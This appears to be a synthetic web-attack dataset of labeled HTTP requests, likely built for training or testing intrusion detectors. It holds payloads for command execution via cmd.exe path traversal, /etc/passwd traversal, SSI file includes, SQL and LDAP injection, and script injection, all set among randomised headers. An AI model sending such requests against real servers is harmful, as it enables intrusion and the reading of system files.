Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48870
Start - Id: 43700
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.thfO.fr:80
Connection: close
Accept: text/plain;q=0.1, image/*, text/html
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 152.233.157.213
Cookie: lilkfsdo=39;imIRdvsarOugeee=pa@h;iwrtko=WiRjachdPhn2nN;sreredxplatl=5;yrabehcnheteraj=2924228;o2simlscdeawet= cxNt@allodietcztwedt
Cookie2: $Version="916"
Date: Sun, 07 Mar 04 24:26:30 GMT
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: efdn@eboax.net
If-Modified-Since: Fri, 20 May 05 14:32:36 GMT
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: "bFwQdS-11pwkApQNW"
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 82
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest cnonce="gbd9a8u"
Range: 0932-655,7-822597,-7
Referer: http://www.tRnaymt.org/sowed1ae/PLh2/infoa8f.rar
TE: deflate;q=0.6,gzip;q=0.4,trailers
User-Agent: Mozilla/1.0 (Windows; U; Win98 6.4; ts-ah; rv:0.9.9) Gecko/56246289
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: 2.6 115.72.82.89, ofnN/5.0 120.196.83.9
Transfer-Encoding: gzip
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43700
Start - Id: 40385
class: SSI
GET /o2/47B/iufbebn/ebXopttne@@7Swgetxwindow.open/JmHZ6VJk0BnCLn.exe?dakatadr7yhh=68255250 HTTP/1.0
Host: 209.147.11.196
Connection: keep-alive
Accept: application/*
Accept-Charset: koi8-r, iso-8859-4;q=0.9, gb2312, iso-8859-8;q=0.4
Accept-Encoding: gzip;q=0.1, compress, deflate;q=0.0, deflate;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 162.123.239.149
Cookie: heaos5easny=8;sget=45853;tonbr9ytsne3m5=<!--     #include    virtual="c:\winnt\system.ini" -->
Date: Fri, 25 Sep 09 22:24:43 GMT
ETag: "@3XIjLoQn.nfHiXpF"
Expect: en2rhstt=scrmou
From: Fts3@iyd0Y.st
If-Modified-Since: Wed, 19 Apr 06 24:39:09 UTC
If-Unmodified-Since: Wed, 23 Aug 06 15:44:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.6
Pragma: tlyDse=agornnoE
Authorization: NTLM dmVkc2FpYWV0bmh0aGF6dDRsb2JocWEwdWduNWlvb3RsY2hycQ==
Range: 903767-676676,28403-55189,444748-4427
Referer: http://cprdhfaS.it/Ddcenas/nttuDbxt/tehMnxn.swf
Trailer: Max-Forwards
User-Agent: Mozilla/9.4 (X11; U; SunOS sun4u 9.8; Ie-Oi; rv:9.5.3) Gecko/81618328
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6700x086
Via: HTTP/1.0 www.Edos.jpeg
Transfer-Encoding: gzip
X-Forwarded-For: 102.20.77.111
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40385
Start - Id: 42024
class: SqlInjection
GET /eeik5icsh6xfsnp/PMecieiarm/tTX-6/t_W9m./stwuoordesi6mnfbteTE.js?Niwe=OR+++%27rgN%27++++IN++%28++%27++%27+++%29&llpsttt6u=eoefelT&GZ6EKPH=lbtatghrnnr9&RKjdJ3Equ=shohworda&ae=fz%3C HTTP/1.1
Host: www.434ho.biz:80
Connection: keep-alive
Accept: application/rtf, image/*;q=0.4
Accept-Charset: windows-1252, utf-8, windows-1253
Accept-Encoding: *;q=0.1
Accept-Language: t-en3dueRs;q=0.4, O7tn-inDte;q=0.8, fo3-ner;q=0.8, i-lesnah
Cache-Control: min-fresh=97
Client-ip: 144.52.64.113
Cookie: Dnvndvsege7tI=81890;KMS-A=eyoOOefQbL
Cookie2: $Version="334"
Date: Fri, 04 Feb 05 03:33:59 CET
ETag: "xrVUfSsUKUujhJHXyI"
Expect: ouiSlPr
From: eliqs@octere.st
If-Modified-Since: Wed, 13 Apr 05 03:35:36 GMT
If-Unmodified-Since: Sat, 31 Dec 05 10:00:25 CET
If-Match: *
If-None-Match: "ET5za89pIK5.DkzGsT6V"
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 0
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="8EBC6AbfdcBAA2fEA94dfDD61baEC0de"
Authorization: Digest opaque="4venij"
Range: 4936-0,-6636
Referer: /oacaI0/ueIecpc/atnghs4a.tar.gz
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: rrrhiUn/0.8.8.4
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0057x268
Via: HTTP/1.6 211.99.188.186:4962, 9.0 89.96.129.153:48917, FTP/3.8 www.u3lie.shtml
Transfer-Encoding: compress
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42024
Start - Id: 46865
class: XSS
PUT /l-MHsm8_G14D/cilp/1Y56o..FCv5Aj7k.gif? HTTP/1.1
Content-Length: 332
Content-Language: cOtz2,d,smlhpo
Content-Encoding: gzip
Content-Location: /b43dio/t08hU.jpeg
Content-MD5: bGllYWJhZWVmRXI0Y2FlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Sat, 20 May 06 12:06:28 UTC
Host: 54.0.18.125
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.4
Accept-Language: tm4uhNm-zusfit, As-lp, ears-p3;q=0.3, Siin-ab, rie7-t;q=0.8
Cache-Control: no-transform
Client-ip: 212.45.149.159
Cookie: uEews1ip0su=735;ri=sK2.ys;EDX6iSA0E=eB.-VU-99
Cookie2: $Version="96"
Date: Sat, 14 Oct 06 07:01:20 CET
ETag: "ynNtDqxUiypefBzDU"
Expect: 100-continue
From: Adtwe7be@o8Kit.ch
If-Modified-Since: Mon, 13 Dec 04 22:31:05 UTC
If-Unmodified-Since: Fri, 08 Apr 05 02:04:25 UTC
If-Match: *
If-None-Match: "6Qyx_v7Rl1wYaFsxy8"
If-Range: Mon, 13 Sep 04 08:24:42 CET
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: leSx ikmsmN=tmSeI0ah
Range: 6262-,10870-70169
Referer: /9fiMf/raali/muboYa/otsddH.aspx
TE: deflate,gzip;q=0.3
Trailer: Referer
User-Agent: xzXHqfqV http://www.vodr.it
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: HTTP/2.3 www.n1rfrad2.png:2348
Transfer-Encoding: gzip
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

iHn67=o;ao+eSperl&h8=hfj_NKb&hzrtthfG6eiatq=?&evmiMZhenent=emehjtolrveaoebo&l5naT=saTin&Wsd=aheo<&maete=duNCAZ&tmoR=vr e3S&os=2494&Opeale3rttaasl=9lv&uT=81093&oLuigt=<xml  src =   "     javascript: [alert    ('aneahnwst');]    "   >&hbepbiIsrlpaIu=56&omnrrordlalgnd=jvaeaOswCkkp&oisetC6zeowiN=46094

End - Id: 46865
Start - Id: 46089
class: PathTransversal
PUT /lR2OwszstlmoudiOehI/eliwqU/heootlajefcecumhrS/oiycbdNun4e/bf43qL3stiCBp7/h9oehoax/oni/a3ewRLhDn8PG/hZrm6/tvaepi.png? HTTP/1.1
Content-Length: 184
Content-Language: sEva,iiahtu
Content-Encoding: deflate
Content-Location: http://dsaN4lwl.be/s4ezerOt/dyye/onucear/brboej/dpesag.php3
Content-MD5: dXJPeWVpbXdwV3NpYzNpNg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 22 Aug 07 17:48:49 UTC
Host: 242.85.32.254
Connection: keep-alive
Accept: video/mpeg;q=0.7, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: xm0i-secaec;q=0.2, aiemet-pb;q=0.5, T7ce-cft;q=0.5, 8fUbbh-ni8eO, cnd0il-eid;q=0.8
Cache-Control: tadeause=5
Client-ip: 242.237.108.67
Cookie: Lm_KkQizAJP0=u.ahgmNBPetu;mHreWyrt=14112202;zn1eosm0rsdkA=tADqcC3C;eaSre=i0bsis$Fnmb(eyt;6anasstzg=aAo;lbtGnnpwmv=UG3yndehefeusesy
Cookie2: $Version="065"
Date: Fri, 16 Sep 05 13:34:09 UTC
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 23:14:17 CET
Max-Forwards: 6772
MIME-Version: 4.9
Pragma: yesr='an'
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: iet9 phlsibs=tbjfe
Referer: http://bsntietc.cz/ehjhk/LC5dDaon/eg12m5/ij2N.swf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.3 (compatible; MSIE 6.8; Win98; rs8ra; 8ncew1)
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 7.5 www.izaed5n.html:5178, 4.2 201.40.5.226
Transfer-Encoding: identity
Warning: 420 www.aarl.jpeg "rnaiov" "Tue, 29 Nov 05 09:15:49 CET"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2samboot.inif3dvl=32&ieVejees5e2che=l)a&oae8eaiKmo=00&P0a0_2Cd=../../../../../../../../../etc/passwd&xaa6np8uaqnt=os9yLZRh&uEyaelauilhsEtn=Rhome8&_T-t9og=link;m

End - Id: 46089
Start - Id: 36406
class: OsCommanding
GET /0VzLG7krFQrtrRQ/tRLe/UZuE/r.zTX4_kg/LiWOAO.BVTTQzV/0zwr/CSs/thguitlqIfdnehwcZtv/tT7ehalfeeatt.sh?NdRgfromC=htfQ&hh0=rso&Nad0tngcsnesjt=06207948&tasx=bulk+++++insert+++eode++from++%27pwdump.exe%27++++with+++%28codepage%3D%27RAW%27++++%29&1Aee9lln5aei=%2Fautoexecm0a5l%3D7%3Ed+l%5Cheo&tcd0wem=UesRny%28%28dartspdr&teite7Ro=e_lNg9&nm=rLIYeFB%40L&tanharQa=95358&Nmv89tc3A7c=nroltqrsynin8&b0hishthhdsIz=r+&r6eaEsxeTg=fo&Gw2s2oWLo=7o%3Elocation&70dltaghozs=rI+husr&ghesias=having HTTP/1.0
Host: 14.0.62.168
Connection: roachomN
Accept: */*
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: deflate, identity, compress, gzip, deflate
Accept-Language: *
Cache-Control: min-fresh=015
Client-ip: 90.203.150.133
Cookie: em=oe8fo3bioednttie;Eiobliuta=iePtqi;usenrxr=45353475
Date: Fri, 11 Dec 09 17:06:26 CET
ETag: "hOr.gXCisBKC7v6cJQ"
Expect: ehdmt
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Max-Forwards: 726
Referer: http://cenhse.biz/oeemW/4Anynn/l5evpo/tzslha.mdb
TE: trailers,deflate
User-Agent: ep2DciUpL http://www.WahFo.de
UA-CPU: PowerPC
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
X-Serial-Number: 3132284615
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36406
Start - Id: 35338
class: SqlInjection
GET /H-HidanmochaTo9G_L/91hrlzhtoholt/rrNIoehis/wnmrnselceEweeDasee.php3?ojwcbedKyu4=3536365&t8e5QTrntio=8&8srusetnde=1404588&NformoXrhttp=fe%27an&ivs0nsa=OR++%27reei7rRE%27+++++IN+%28%27%27++%29&Tfn6=e%28 HTTP/1.0
Host: www.teOSm.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="9"
Date: Wed, 26 Jan 05 12:21:38 UTC
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Thu, 13 Aug 09 07:14:53 UTC
If-Unmodified-Since: Mon, 22 Oct 07 13:50:19 UTC
If-Match: *
If-None-Match: *
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 8
MIME-Version: 1.4
Pragma: Earc='5gno1tn'
Proxy-Authorization: 9m1G irNrna=auC77ta
Authorization: Digest qop=auth-int
Range: 16442-228208
Referer: http://8nig.net/jio6eus/nyHwatgt/jgnswd/n9oek.cgi
TE: trailers,deflate
Trailer: Via
User-Agent: 24QQW-Xa http://www.mtPdT4ee.it
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 5.5 www.eNsTeth.png, 7.4 32.119.123.63
Transfer-Encoding: compress
Upgrade: trno9o/8.6, tnr9dg/0.3, iet/0.3
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 29.33.121.207
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35338
Start - Id: 44812
class: PathTransversal
GET /yrNnefhmvcAiaeec/nhtytte.cgi?4o8UiQh=7eacejehteaE&iapestehmognasl=y3aad&edsit0nEe=doc%28+file%3A%2F%2F%2Fc%3A%2F1r%2Fsaedr.xml++%29&hoot4ranl=re&pls6lo=irehntsosrckB HTTP/1.1
Host: www.6agtmy7t.biz
Connection: keep-alive
Accept: video/quicktime, application/*
Accept-Charset: cp-936;q=0.9, iso-8859-8;q=0.0, shift_jis, x-mac-greek, windows-1251;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.199.90.42
Cookie: daonun4=[aicAn;leeooeaecoieh=Nssi1
Cookie2: $Version="8"
Date: Mon, 29 Jun 09 04:17:13 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 09 Mar 08 04:49:59 CET
If-Unmodified-Since: Wed, 01 Dec 04 24:10:00 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 614
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: Digest nc=233d0BC0
Range: -970
Referer: http://ohb97jst.it/Ncnba3m/bEncjsq.shtml
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.5 (X11; U; SunOS sun4u 5.7; u9-si; rv:6.8.4) Gecko/98234165
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0162x7659
Via: 0.9 www.6hohEnr.tiff, 7.1 134.138.220.239
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 20.26.247.44
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44812
Start - Id: 38715
class: LdapInjection
GET /oH2-250K0TE/g2t/hrn/58ahr/egp-l3bDk7LntD1/YheBtelnetz.png?tanygoS2eqeats=nnOsam&tadrt=arcp%26w%27neu&ueozdpcr=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&cFFlatnr=349&gIHCgroup by--W=5iaGhr0+e+te+3%5Bo&leIse1zt=57&sgcad=eKunion&BluT=ix5ndrreHgr&mNtty5ubd1H=08665 HTTP/1.0
Host: 164.112.98.151
Connection: keep-alive
Accept: application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=34
Client-ip: 95.161.31.177
Cookie: oe5=pS3H0jBsaH;3phomefyM.KT=hs_t2hhi;ysmye=y3d6processing-instructionln4sw;2armdr8aoe=usEcs0k0g
Cookie2: $Version="57"
Date: Mon, 13 Nov 06 05:09:46 GMT
ETag: "Bv3MWVUDzEwvzQQfmL"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Sun, 21 Feb 10 22:37:01 UTC
If-Unmodified-Since: Mon, 13 Apr 09 10:00:37 CET
If-Match: "hBO3-EiL@.CCvD1PA@HY"
If-None-Match: "cJno@Uj23fjxIs1"
If-Range: "IBdIHPS9dyfxZofX"
Max-Forwards: 17
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: NTLM eVBhT2VyZWVlY2VlZXJ0b3NsUmNtc3JlOWZvZWUxbXdPbGN0
Range: 557810-
Referer: http://www.xfne.uk/demgueA/c6o8t/ikzeico/etersro/wtrl.exe
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/7.5 (compatible; em7TaheA; WinNT; anarwZetoh; olsQntf; tatl)
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/7.2 www.euAe.shtml, HTTP/6.7 72.200.125.131:6
Transfer-Encoding: identity
Upgrade: aio/4.8, yfbxla/4.5, a7nrka/5.7
Warning: 342 www.9ohgn.htm:935 "Zduaeomxwo5fiu" "Fri, 23 Dec 05 04:28:42 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38715
Start - Id: 40901
class: SSI
GET /D8xtermEKVFc2bdet1/lsl6y/oraUhpe3css/9DdqNsoE2erHsroeo/MbwhereHMwhApassthru.jsp?asnu2sehG3y=98544&bTcesbd=%3C%21--+%23odbc+++connect%3D%22jj0the%2Cea%2C9rwa0%22++++++statement%3D%22select+++*+from+st%22--%3E&hdys8rie7=gqeo%5CAdoabncG&gnht=ukd&d1poBSZ=+%5Bdeletel&BYuf-=25405235&i8r6aonlgin=crvfvexecalwn&gybsyo=rxOSsgiebr7nEyl&nteco=aV04mG&thvrEute=tS7u0Tjyj&Lq0dbO=ezrRG&tehitnLudNnn=4&hedbwamd=varu&JcLusr=52135&yE=RimR0%2Bce HTTP/1.1
Host: www.gar9.com
Connection: iBfy
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 215.13.110.135
Cookie: fgaevnunbel=pwxd-LPi9;av8eOfyh=copyrnhhdtNeal1l;drtmeqTrcDn=uti8pb7a;5atudnrt=ihnisoliba;syE=)me
Cookie2: $Version="664"
Date: Fri, 10 Jul 09 12:32:46 UTC
ETag: W/"Hbi9FlqOqi2IBOOJ0"
Expect: 100-continue
From: ditrnsd@mzoyfsuain.uk
If-Modified-Since: Mon, 07 Mar 05 21:45:03 UTC
If-Unmodified-Since: Tue, 25 Jan 05 12:54:31 UTC
If-Match: "JFFjtQ3dMZUbi3yyi"
If-None-Match: *
If-Range: Sun, 02 Sep 07 11:22:26 GMT
Max-Forwards: 893
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: Basic Zk9BaGk6dGVSYWM0c3Q=
Range: 776-,-33080
Referer: /ssne/hnsw7Sdn/aebthw8o.wmn
TE: chunked;q=0.6,deflate;q=0.5
Trailer: Expect
User-Agent: Mozilla/3.6 (X11; U; Linux i586 0.9; 4l-3s; rv:8.0.5) Gecko/70791326
UA-CPU: StrongARM
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 206x873
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40901
Start - Id: 47292
class: XSS
GET /1ntdnhc1csunibdn/n4oasmHnuIuatl/cw/qP3vjwqBT9JfV.ry/33iorocoee7hlssaernn.png?s1nrs0aehten=l%3D&RAwwoqtt=%3Cimg++++src++++%3D+++%22+javascript%3A+%5Balert+++%28%27tow5Yiahae%27%29%3B%5D+%22+%3E&pneo=aus4Decp&ld=o3Tt%40mpRSt HTTP/1.1
Host: 252.125.98.42
Connection: ocieeFh
Accept: image/gif, audio/basic
Accept-Charset: iso-8859-9;q=0.9
Accept-Encoding: *
Accept-Language: dit8ie0-tx;q=0.5
Cache-Control: no-cache
Client-ip: 156.129.47.155
Cookie: rpLQEexecbcr=2890;Ifnnfonl=77903127;seitemxrrTimat=:gandue
Cookie2: $Version="2"
Date: Thu, 10 May 07 02:04:23 UTC
ETag: W/"Ti_gfcR2jdX5V4dGY0n"
Expect: mTIktib
From: peTeu9@mayraae.fr
If-Modified-Since: Fri, 07 Mar 08 02:57:40 CET
If-Unmodified-Since: Mon, 14 Sep 09 15:13:42 UTC
If-Match: *
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Thu, 18 May 06 01:02:06 GMT
Max-Forwards: 087
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic d2VheToxTGVmZQ==
Range: -4,7256-5,39-5314
Referer: /ooanr/tsfsosmw.zip
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/9.6 (X11; U; Unix 7.4; Ar-7n; rv:5.5.6) Gecko/25270382
UA-CPU: Sparc
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 5.3 10.250.186.184, FTP/5.4 129.12.128.189
Transfer-Encoding: deflate
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 269675731221597037
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47292
Start - Id: 45258
class: PathTransversal
GET /./? HTTP/1.1
Host: 135.191.120.224:82700
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, x-mac-korean;q=0.6, shift_jis
Accept-Encoding: deflate, gzip, compress;q=0.0, gzip;q=0.7
Accept-Language: tnfho1-vG6Zm;q=0.2
Cache-Control: min-fresh=44
Client-ip: 197.120.255.144
Cookie: ex=9lqeiwp-mNTi4Ho9;iikuqtfe=ntt;ksTb0ntgiw6=93208789
Cookie2: $Version="36"
Date: Fri, 22 Feb 08 06:18:44 UTC
ETag: "aEx1_obfnEaMPvXi2"
Expect: 100-continue
From: tintef5@tbwhr.net
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: "uj_ovQk5au_1.EvgGTS"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: oaeefH gvtv7kf=eE4genj
Range: -249,23568-43
Referer: /Txscnagt/rtluak.php3
TE: trailers,deflate
Trailer: Host
User-Agent: tsahwlTArs
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: deflate
Upgrade: b9r/9.4
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 95.222.138.243
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45258
Start - Id: 44211
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 236.105.6.18
Connection: close
Accept: audio/basic;q=0.5, video/mpeg
Accept-Charset: iso-8859-8, x-mac-greek, cp-936, iso-8859-6;q=0.8, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale=22
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Fri, 09 Jul 04 16:16:54 CET
ETag: "fCVpdS-De4XAIYRavLw"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Sat, 22 Mar 08 02:52:10 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 May 06 08:33:18 CET
Max-Forwards: 3
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest realm
Range: 09660-850419
Referer: /jeiyTho/wsuesyei/o0ylrP/aasoyRt.jpg
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/0.5 (X11; U; Linux i586 8.9; bo-1t; rv:9.1.5) Gecko/98328105
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 953x6132
Via: HTTP/7.4 183.247.230.93, HTTP/9.7 213.76.252.111:81687
Transfer-Encoding: identity
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 834 www.ecbnesr.png "oqoba9" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44211
Start - Id: 44822
class: PathTransversal
GET /hj7O5/iRKeyZ0bin9/nZ/aX/6iTLJotctil2Zrh/tGLwr6sHccsz@clj8.cgi?fqS4oealaeewosf=o&nnRlohooteE4e=kaesqtihnuup3itet&ngTkow=jo&nEs9=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&csedkersccpkh=bsngxrextermiea&nttwruywts=th HTTP/1.1
Host: www.hg5oet.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 92.163.213.217
Cookie: eb93urdui=gh3;imqql=ncysLmb0V
Cookie2: $Version="23"
Date: Tue, 05 Jul 05 04:07:58 CET
ETag: W/"cxFIN7xbm6PFzN9.QI"
Expect: 100-continue
From: ecsie0r@aat1r.com
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Tue, 12 Aug 08 04:45:53 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "grIOzWd4mODJSc-sGhxE"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 89
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: /x0rrr/hsp5Tg/tlre4/Fmlunhin/eznYsor.css
TE: trailers,gzip;q=0.7
Trailer: If-Range
User-Agent: o9ioehlsnm/2.6.9.0
UA-CPU: MIPS
UA-Disp: 5327,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/8.2 www.feet9sc.js, 1.1 www.ieoBerho.html
Transfer-Encoding: compress
